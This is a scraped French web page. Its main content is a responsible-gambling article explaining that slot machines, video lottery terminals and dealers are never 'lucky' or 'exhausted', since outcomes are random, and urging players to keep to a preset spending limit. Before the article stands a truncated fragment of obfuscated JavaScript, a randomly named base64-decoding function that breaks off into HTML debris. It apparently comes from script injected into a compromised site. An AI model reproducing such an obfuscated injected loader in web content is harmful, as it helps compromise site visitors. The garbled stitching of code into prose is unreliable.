function h052c1b60aed(x6){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var t4='';var t2,u1,q3,q7,sa,r9,u2;var u4=0;do{q7=qd.indexOf(/" />

Les machines « porte-bonheur » et « épuisées » : elles n’existent pas

Les machines « porte-bonheur » et « épuisées » : elles n’existent pas

ImageAs-tu déjà entendu quelqu’un dire ce qui suit (ou la même idée t’est-elle déjà venue à l’esprit)?Ce croupier a été extrêmement chanceux – nous n’avons eu aucune chance contre lui ”

Je ne pouvais perdre, et puis ma machine était épuisée – j’aurais dû arrêter à ce moment-là.

L’idée qu’il existe des machines, croupiers – voire certains lieux – qui portent ou ne portent pas bonheur….tient du mythe. Un regard sur le passé nous permet parfois de déceler des tendances (tu te rappelles le concept de la compréhension après coup) où nous gagnions (ou perdions) souvent. Voilà le caractère imprévisible des jeux de hasard. En effet, les machines à sous et les appareils de loterie vidéo ne sont pas programmés de manière à favoriser des cycles gagnants ou perdants – chaque tour de roue ou chaque main donne au joueur la même chance de gagner (pour plus de renseignements, consulte la section Générateurs de nombres aléatoires dans les machines à sous et les appareils de loterie vidéo).

Les jeux de hasard se traduiront toujours par des gains et des pertes, et il pourrait même t’arriver de réaliser beaucoup de gains et de subir peu de pertes ou vice versa. Cela ne veut pas dire qu’une machine ou un croupier porte ou ne porte pas bonheur – il s’agit tout simplement du caractère aléatoire des jeux. Certes, les pertes seront à la longue plus nombreuses que les gains. Si tu connais de nombreux gains, tant mieux! Si tu subis de nombreuses pertes, assure-toi de ne pas dépenser plus d’argent que la limite fixée d’avance et tout ira bien.